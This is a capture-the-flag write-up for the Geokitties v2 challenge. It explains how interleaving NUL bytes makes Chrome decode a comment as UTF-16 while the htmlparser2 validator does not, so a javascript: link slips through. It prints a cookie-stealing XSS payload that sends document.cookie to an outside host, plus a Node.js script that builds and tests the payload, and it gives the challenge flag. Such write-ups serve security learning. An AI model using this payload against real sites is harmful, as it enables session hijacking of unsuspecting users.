Overview

Problem page:
https://geokittiesv2.web.ctfcompetition.com/

Copy of source code:
https://gist.github.com/tyage/cac08c8e17b90b840fb22cb434cff127

The application accepts a comment; an admin bot then views the comment and clicks any link in it.

The comment is validated with htmlparser2.

Allowed tags: p, a, b, img, br, i
Rejected attributes: anything matching on(.*)= and href=javascript:...

Solution

The goal is to find a parsing difference between Google Chrome and htmlparser2.

After some time, I realized that when the input looks like a UTF-16 string, Chrome parses it as UTF-16 but htmlparser2 does not.

For example, htmlparser2 parses the HTML below (\x00 is a NUL byte) as an element whose tag name is \x00a\x00.

\x00<\x00a\x00>\x00<\x00/\x00a\x00>\x00

<\x00a\x00> is not a valid tag, so it fails the allowlist; we have to give htmlparser2 an allowed link instead, like this:

\x00<a \x00>\x00<\x00/\x00a\x00>\x00

Now htmlparser2 sees a tag named a (allowed), but Chrome, decoding the bytes as UTF-16, does not see an HTML element there at all. The trick depends on Chrome guessing the page encoding from the byte pattern; a charset declared in the Content-Type header or a meta tag would pin the decoding and kill it.

So we can build a payload that htmlparser2 sees as an allowed <a> tag whose attribute names merely contain NULs, while Chrome, after UTF-16 decoding, sees a real <a href=javascript:...> link:

'\x00<a \x00' + "<a href='javascript:location.href=`//tyage.net/`+document.cookie'>".split('').join('\x00') + '</a>'
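As an added example (not code from the write-up or from the challenge), the Node.js script below rebuilds the payload and shows the two views of the same bytes. The validator side is modelled by a small tag scanner of my own, not htmlparser2 (it differs in details, e.g. htmlparser2 also accepts \x00 as the start of a tag name, which the scanner does not); the Chrome side is modelled by decoding the bytes as UTF-16 big-endian, the byte order implied by leading the payload with \x00. Both models are assumptions; the allowlist and the two attribute rules are the ones the write-up lists.

```javascript
// Added example (not the challenge's or the author's code): reproduce the
// Geokitties v2 parser differential in Node.js. Assumptions: the validator is
// modelled by a simple tag scanner (NOT htmlparser2), and the browser is
// modelled by decoding the same bytes as UTF-16BE, as the write-up describes.

// The real link we want the browser to render (copied from the write-up).
const INNER = "<a href='javascript:location.href=`//tyage.net/`+document.cookie'>";

// The write-up's payload: lead with "\x00<a \x00" so a byte-at-a-time parser
// sees an allowed <a ...> tag, put a NUL between every character of the real
// link so no forbidden attribute survives intact, then close the tag.
function buildPayload(inner = INNER) {
  return '\x00<a \x00' + inner.split('').join('\x00') + '</a>';
}

// What a browser sees if it decodes the bytes as UTF-16BE: every "\x00X" pair
// becomes the ASCII character X, so the interleaved link reappears intact,
// while the leading "a " becomes one CJK character (U+6120) and the trailing
// "</a>" becomes two (U+3C2F U+613E).
function utf16beView(payload) {
  // Every payload char is a single byte, so 'latin1' maps them 1:1 to bytes.
  let bytes = Buffer.from(payload, 'latin1');
  if (bytes.length % 2) bytes = Buffer.concat([bytes, Buffer.alloc(1)]);
  // Node has no utf16be decoder: swap each byte pair, then decode as UTF-16LE.
  bytes.swap16();
  return bytes.toString('utf16le');
}

// Simplified stand-in for the challenge's checks (assumption, not htmlparser2):
// a tag starts at '<' followed by an ASCII letter (as the HTML spec tokenizer
// requires), its name runs to whitespace, '/' or '>', the rest up to '>' is
// the attribute text. Then apply the write-up's rules to each tag.
const ALLOWED = new Set(['p', 'a', 'b', 'img', 'br', 'i']);

function scanTags(html) {
  const re = /<([a-zA-Z][^\s\/>]*)([^>]*)>/g;
  const tags = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    tags.push({ name: m[1].toLowerCase(), attrs: m[2] });
  }
  return tags;
}

function isAllowed(html) {
  for (const { name, attrs } of scanTags(html)) {
    if (!ALLOWED.has(name)) return false;                          // not in the allowlist
    if (/on.*=/i.test(attrs)) return false;                        // on(.*)= handler attribute
    if (/href\s*=\s*['"]?javascript:/i.test(attrs)) return false;  // href=javascript:
  }
  return true;
}

const payload = buildPayload();
console.log('validator on the raw bytes allows it:', isAllowed(payload));               // true
console.log('UTF-16BE view:', JSON.stringify(utf16beView(payload)));
console.log('validator on the UTF-16BE view allows it:', isAllowed(utf16beView(payload))); // false
```

Run it with node. On the raw bytes the scanner finds one tag named a whose attribute text is NUL-riddled junk, so both regexes miss and the comment passes. The UTF-16BE view starts with `<` followed by U+6120; because the HTML tokenizer only opens a tag when `<` is followed by an ASCII letter, a browser emits that `<愠` as text and then parses the real `<a href='javascript:...'>` that follows. Run over that decoded view, the same href check fires, which is exactly the view the challenge's validator never got to see.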

Finally, the admin's visit gives us the flag: CTF{i_HoPe_YoU_fOunD_tHe_IntEndeD_SolUTioN_tHis_Time}

Category: CTF
